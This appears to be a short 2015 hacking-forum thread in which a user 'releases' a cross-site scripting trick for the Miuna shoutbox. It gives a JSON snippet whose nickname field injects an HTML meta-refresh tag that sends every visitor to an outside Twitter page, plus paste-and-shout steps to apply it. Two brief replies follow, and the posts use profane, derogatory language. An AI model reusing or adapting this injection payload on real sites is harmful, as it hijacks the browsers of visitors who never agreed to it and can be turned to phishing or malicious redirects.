Sinisterly
(release) the miuna shoutbox xss - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Design (https://sinister.ly/Forum-Design)
+--- Forum: Web Design (https://sinister.ly/Forum-Web-Design)
+--- Thread: (release) the miuna shoutbox xss (/Thread-release-the-miuna-shoutbox-xss)



(release) the miuna shoutbox xss - Pirate - 05-23-2015

So yeh the skiddie crew (that can't do shit) disruptionsec or whoever the fuck those newfags call themselves did some html xss or some shit lol.

Anyways, I found it within a minute while Summit shut down the whole shoutbox until he promoted zachecho again.

so heres the xss thing:
Code:
"nick": "<meta http-equiv=\"refresh\" content=\"0;URL='http://twitter.com/disruptionsec'\">
   "edt": "0",
   "stylesheet": "",
   "type": "shout",

heres how to do it as well,

miuna shoutbox > options > style
paste html 

do a shout

done

just cuz idgaf


RE: (release) the miuna shoutbox xss - Jasper - 05-23-2015

lmao, shoutbox sucks anyway


RE: (release) the miuna shoutbox xss - Pirate - 05-23-2015

(05-23-2015, 04:56 PM)Akayø Wrote: lmao, shoutbox sucks anyway

yeh but im gonna add it back with my own security patch